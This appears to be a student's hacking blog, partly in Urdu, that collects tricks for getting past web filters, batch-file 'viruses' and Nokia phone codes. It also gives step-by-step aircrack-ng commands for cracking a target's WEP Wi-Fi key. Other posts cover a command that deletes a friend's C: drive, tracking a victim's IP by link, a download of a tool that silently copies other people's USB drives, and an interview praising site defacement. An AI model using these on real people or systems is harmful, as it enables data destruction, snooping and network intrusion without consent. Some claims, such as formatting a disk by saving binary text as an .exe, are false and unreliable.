HAck WIFI KEY IN BACKTRACK

How to Access Block Websites

HOW TO ACCESS BLOCKED WEBSITES:







Many schools and colleges do not allow their students to use some social networking sites and other sites like facebook, twitter and youtube. Here I have given some tricks on how to access blocked internet sites. Enjoy…
How to access blocked websites
Steps to access blocked websites:
Step 1: Use https:// instead of http://
 Ex:- Use https://www.facebook.com instead of http://www.facebook.com

Step 2: Use Internet Based Proxy Servers instead of Google Chrome and Mozilla Firebox
    HideMyAss.com
    ByPassthat.com
    Kproxy.com  

Step 3: Use IP address instead of Domain Names
             Ex:- Use 31.13.79.23(IP address) instead of www.facebook.com
By using this three methods you can access blocked internet websites.
 

How to find Websites IP
   Go to Run
   Then Type ping ‘space’ website Name (Ex:- Ping www.facebook.com)
The Command Ping www.facebook.com Shows
Pinging www.l.google.com [31.13.79.23] with 32 bytes of data:


Reply from 31.13.79.23: bytes=32 time=294ms TTL=55
Reply from 31.13.79.23: bytes=32 time=295ms TTL=55
Reply from 31.13.79.23: bytes=32 time=272ms TTL=55
Reply from 31.13.79.23: bytes=32 time=291ms TTL=55By

Using the above command you can find IP address for any website..!

Create Viruses

Create 5000 Folders

How We Create More Than 5,000 Empty Folders?
Open Notepad and Type: 

  off :top md %random% Goto top

And Save It Folder.Bat Enjoy!


Apni Dost Ki Windows Crush Karen

Iss Virus Se Apni Dost Ki Windows Crush Karen.
Open Notepad And Paste This Code On Your Notepad:

@Echo off
Del C:\ *.* y


Aur Iss ko Save As kar ke .Bat Mein Save kar Den.
For Example Crush.Bat Mein Ya Any One kisi Bhi Naam Se Save kar Den Phir Last Mein .Bat Aana Chahiye. Enjoy!

Formate Hard Disk With Notepad

Write the following code in notepad:
010010110001111100100101010101010100000111111 00000
Save as Boom.exe

Shutdown Your Computer using ur Mobile phone

Shutdown Your Computer using ur Mobile phone



Using this method, a user can shutdown, restart, hibernate, etc. his or her computer, just by sending an email from his or her phone. To do this, all you will need is Microsoft Outlook which should come with Microsoft Office, which most people have. This will need to be on the computer wish you wish to shutdown. So, this is how you do this:
1. First, you need the batch files to perform the Shutdown, Hibernate etc. You can write them down yourselves
2. open your note pad and write lik this... Quote: c:\windows \system32\shutdown -s -f -t 00 and save it as shutdown.bat
3. Open up Microsoft Outlook. Make sure that you have already configured it for your email.Now we will need to make it so that Outlook checks your inbox about every minute (1 minute for testing time can be increased if a delayed shutdown is desired). You can do this by going to Tools: Options.
4. Then click the Mail Setup tab, and afterwards, the Send/Receive button.
5. Make sure that the Schedule an automatic send/ receive every... box is checked, and set the number of minutes to 1. Now you may close all of these dialog boxes.
6. Now go to Tools: Rules and Alerts... Next click the options button in the upper right hand corner and press the Import Rules button.
7. Now select the shutdown.bat file ...whi u hv created ...
8. Now, when you send a message from your phone to your e-mail address with the subject shutdown or smsshutdown%%, your computer will shutdown. Tip: Use of any of the Isolated or dead E-mail address or any e-mail will shutdown your computer. I hope you like it.
Enjoy.......!

Information For NOKIA CellPhone

Information For Nokia Mobile Phone:

information for Nokia Mobile Phone.

Nokia Mobile Phone secrets, codes and technical information.

1. Code *3370# -Activate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx 5%.
#3370# -Deactivate Enhanced Full Rate Codec (EFR).

2. *#4720# -Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time.
*#4720# -Deactivate Half Rate Codec.

3. *#0000# -Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line : Compression Type.

4. *#9999# -Phones software version if *#0000# does not work.

5. *#06# -For checking the International Mobile Equipment Identity (IMEI Number)

6. #pw+1234567890+1# -Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).

7. #pw+1234567890+2# -Network Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).

8. #pw+1234567890+3# -Country Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

9. #pw+1234567890+4# -SIM Card Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).

10. *#147# -(vodafone) this lets you know who called you last.

11. *#1471# -Last call (Only vodofone).

12. *#21# -Allows you to check the number that "All Calls" are diverted to.

13. *#2640# -Displays security code in use

14. *#30# -Lets you see the private number.

15. *#43# -Allows you to check the "Call Waiting" status of your phone.

16. *#61# -Allows you to check the number that "On No Reply" calls are diverted to.

17. *#62# -Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to.

18. *#67# -Allows you to check the number that "On Busy Calls" are diverted to.

19. *#67705646# -Removes operator logo on 3310 & 3330

20. *#73# -Reset phone timers and game scores.

21. *#746025625# -Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it means you will get the best standby time possible.

22. *#7760# -Manufactures code.

23. *#7780# -Restore factory settings.

24. *#8110# -Software version for the nokia 8110.

25. *#92702689# -Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again.

26. *#94870345123456789# -Deactivate the PWM-Mem.

27. **21*number# -Turn on "All Calls" diverting to the phone number entered.

28. **61*number# -Turn on "No Reply" diverting to the phone number entered.

29. **67*number# -Turn on "On Busy" diverting to the phone number entered.

30. 12345 This is the default security phone lock code.

31. press and hold # -Lets you switch between lines.

If you know any nokia codes which is not here kindly wright it in the comment box.

Nokia 3250 / N91 / N71 / E60 / E61 / N803230 / 6260 / 6600 / 6620 / 6630/38 / 6670 / 6680/81/82 / 7610 / N70 / N903650 / 3660 / 7650 / N-Gage / N-Gage QD.

Recover deleted Partition/Drive

"How To Recover Deleted Partition/Drive"

Friends Agar Apke koi Drive Format Ho Jati Hain Ya koi Partition Delete Ho Jati Hain Tu Gabranay ke 

Zarorat Nahi Ap Apne Data ko Easily Recover kar Sakte Hein Chand Steps Hein Ap Un ko Follow karn 

Apka Data Recover Ho Jaye.

Step 1: Ga Ap k Pas Window XP Crystal ke CD Honi Chahiye.


Step 2: CD CD-ROM/DVD-ROM Mein Insert kar kay Boot karen.


Step 3: Hiren CD ke Select karen Then Ap k Pas 2 Mazeed Option Aye Gay 1-Start Windows 2-Start 

BootCD Ap option 2 Start BootCD ko Select kar k Enter Press k


Step 4: karen Ab Ap kay Samnay Different Tools Hon Gay. Ap Fast Number Majood "Disk Partition 

Tools" ko Select kar k Enter Press karen.


Step 5: Ab Ap k Samnay Different Partition Tools Hon Gay, Ap Number 2 Pe "Acronis Disk Director 

Suite 9.0.554" Select kar k Enter kar Dain.


Step 6: Ab Ap Se User Interface Mode k Baray Mein Pocha Jaye Ga, Automatic Mode ko Select kar k Ok kar Dain.

Step 7: Left Side Pe Pe Wizards Tab k Nechay 4 Option Hon Gay, 1-Create Partition. 2-Increase Free 

Space 3-Copy Partition 4-Recover Partions Hum Ne Chon'Kay Deleted Partition Recover karni Han Tu

Ap Recover Partition Ko Select kar Dein.


Last Step: Select Next Ab Ap k Pas 2 Option Hen 1-Automatic 2-Manual Manual Select kar k Ap 

Apni Marzi ke Partition Recover kar Sakte Han Jab k Automatic Pe jitni Bhi Partitions Aur Drives 

Delete Howi Hein Wo khud Recover Ho Jaye Ge. Note: 20 GB ke Partition ko Recover karte Howay 

Apko Atleast 45 Min Lag Sakte Hein, Jitni Partitions/Drives Deleted Hon Ge, Recovery Mein Utna Ziada 

Time Lagay Ga.

hack ip address of a person via Email

How to Find Ip of victim Via Email:




Sub Say Pehly Ap WhatsTheirIP.Com Par Jaye Or 


Apni Email Address Likh Kar Get Link Par Click Kro 

Wo Apko Aik Link Dain Ga Osay Copy Kar K Apny 

Victim Ko Send Kar Dain. Jab Wo Is Link

Par Click Kary To Victim Ka IP ApKi Email Inbox 

Main Aa Jayega.


Trick By Abdullah khan*****

How to know ip of a person On Facebook

How to know ip of a person On Facebook:

This Technique Works When You Are Chatting With That Person. The First Demand Of Operation is To Close All Of The Website And Messengers That You Are Using, Even Clean History and Delete Cookies as Precaution. Now Start Chatting With That Person.
The First Thing You Do is To Open Start -> RUN -> CMD Now in it Type Following Command:
 
netstat –an
 
And Wait And Watch The Foreign Address Will Be The IP Address..!!!! 
A trick From ...abdullah khan*

Usb Dumper

USB Dumper:

USBDumper is a cute little utility that silently copies the contents of an inserted USB drive onto the PC. The idea is that you install this piece of software on your computer, or on a public PC, and then you collect the files -- some of them personal and confidential -- from anyone who plugs their USB drive into that computer.

No big deal to anyone who worries about computer security for a living, but probably a rude shock to salespeople, conference presenters, file sharers, and many others who regularly plug their USB drives into strange PCs.





click here to download usb dumper 
http://www.4shared.com/get/tS1w-B_7/USB_Dumper.html
this tool is use for fetch victim pen-drive.

Hacker Interviews

Exclusive Interview of PCE (Pak Cyber Eaglez) with hackerz team
  PCE team are pakistani hackers, and pathans ,


(1) when, where and how was PCE set up?

PCE was set up 3 months ago . PCE is the underground team Pakistani hackers, we the P@KhTuN~72 | Mast3r M!nd | Sizzling Soul | SP@Rk | Code Crack3r | 3v!L
are the good friends since 2 years so we thought to launch that time,basically it was set up to show the world the Reality of Pakistani's.

(C) what is the goal of the group?

Simple Goal of group to tell the world that Who We Are? as you may be aware that the image of Pakistan over the world
is not so good so we are trying to tell the reality to explain our dignity and to also give the strong answers to anti Pakistan Countries.

(D) how easily were you able to hack the Nigerian websites?

well, it was not so easy to broke into these sites, but still the server and hosting was not se secured.
(E) In terms of website security, what's the weaknesses in the four Nigerian websites?

sites were secure enough. but the admin panel and the hosting plus the server was not so secured.

(F) What do you plan to achieve with hacking government sites?

well we always tried to hit the government sites and the famous sites so we can easily convey Our message..especially to the governments of the whole world.

(G) I've seen several movies that depict hackers in different positive and negative sides. In your own view, is hacking a positive thing?
yep sure why not it is a positive thing for security testing. like if you email some admin about the loop holes of the site they just don't give damn ear to your message.but when you hack the site it really stimulate them.

(H) Facebook was recently hacked by a professional hacker who notified the company, and the bug was fixed. This shows hackers are needed in fostering web security. But just yesterday, websites of media houses and banks in South Korea were brought than by hackers to be from North Korea. What do you think hackers and governments can do to ensure that hacking is used positively?
yep look the bug was notified to the hackers and they took the positive action but what will you do if they admins dont give any importance to your message so the one and strong way is to just change the index of that site.

(I) What are your most notable targets?
i hit alot of sites i don;t remember to be honest,, but to hack every government site is really something for me.

(J) What are your next targets?
well, next target is not so sure, but some of the countries are messing with Pakistan so we are working on them...

(K) Do you make a living from hacking?
No...


(L) Briefly enlighten our readers on how to make their websites secure.
Nothing is secure in Cyber World.. even google & facebook... Th Way Strong Passwords mean Special Characters can safe your password 50% But Security Is Nothing On Dedicated Servers.

Caution: Neither these hackers have any type of relation with us nor we have with them and these all interviews are only informative in nature.

Hacking Wifi

HACKING WIFI USING BACKTRACK":


Here are 2 methods to hack wifi passward, do that method which is easy to u, i personally not try it, i got this information from hackers,

Method 1 : 

First of all you need to scan for available wireless networks.

you can use“NetStumbler” or “Kismet” for Windows and Linux and KisMac for Mac.

It’ll also show how the Wi-fi network is encrypted. The two most common encryption techniques are:

1) WEP (Wire Equivalent Privacy )

2) WAP(Wireless Application Protocol)

WEP allows a hacker to crack a WEP key easily whereas WAP is currently the most secure and best option to secure a wi-fi network

It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.

How to Crack WEP

To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP.

BackTrack have lots of preinstalled softwares but for this time
The tools we will be using on Backtrack are:

a)Kismet – a wireless network detector
b)airodump – captures packets from a wireless router
c)aireplay – forges ARP requests
d)aircrack – decrypts the WEP keys

Follow the steps One by One

1) First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.
2) To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.

3) In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN 0=OTHER(usually WAP).

4) Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit to get more information about it.

5) The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:

airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]

In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after –bssid. The command ends with the device name. Make sure to leave out the brackets.

6) Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]

In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.

7) Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]

In this command, the -3 tells the program the specific type of attack which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapters MAC address, and the wireless adapter device name goes at the end.
Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:

aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs

In this command the -a 1 forces the program into the WEP attack mode, the -b is the targets MAC address,and the -n 128 tells the program the WEP key length. If you don’t know the -n , then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key.




Download backtrack iso file and make bootable usb and you can plug and play backtrack easily

Method 2:

Hack Wifi With Backtrack Linux window

Step 1: Run VMware and open Backtrack iso.

Step 2: Open Shell Consol after start Backtrack.

Step 3: Type airmon-ng and hit enter. It will show you interface, chipset, driver, etc.

Step 4: Type airodump-ng wlan0 and hit enter. Wait a while when it is searching for available connections.

Step 5: You can see a list. Chose a hotspot name you want to hack.

Step 6: Copy the ch value of your selected connection. Then type airdump-ng-c and past ch value just after this. Next to the ch value type –bssid space your bssid number and -w wep_hack wlan0 and press enter.

(Example: airdump-ng-c ch value –bssid 00:1F:9F:73:C0:45 -w wep_hack wlan0)

Step 7: Wait and do not close the window.


Step 8: If this window has finished then open a new shell console and type dir and hit enter.

Step 9: Type aircrack-ng -a 1 –b and your bssid.

(example: aircrack-ng -a 1 -b 00:1F:9F:73:C0:45 wep_hack-01.cpp)

Step 10: If you have seen this text decrypted correctly 100%, it means you have successfully done this process.

Now you can see you desired Wi-Fi password just above this massage.

Here is all How To Hack Wifi Password do comment down if work for you and if had any problem there i know it is lil’bit difficult to hack but you can use after that free wifi so try that .. 


ur bro Abdullah khan bscs university of swat

Welcome To IT blog

WeLcome To Hacking and  IT blog!

My Name is Abdullah khan From khyber Pukhton khwa(kpk) pakistan, i am student of Computer science in university of swat. My sweet Frnds are Arsalan khan,Khalid Rahim, and Yousaf Ali who help me to making thsi blog & Really Thanks TO my dear Frnd Shahmir Ali khan, that He appreciate my Work and Help In making This Site for your's Learning...


THANKS!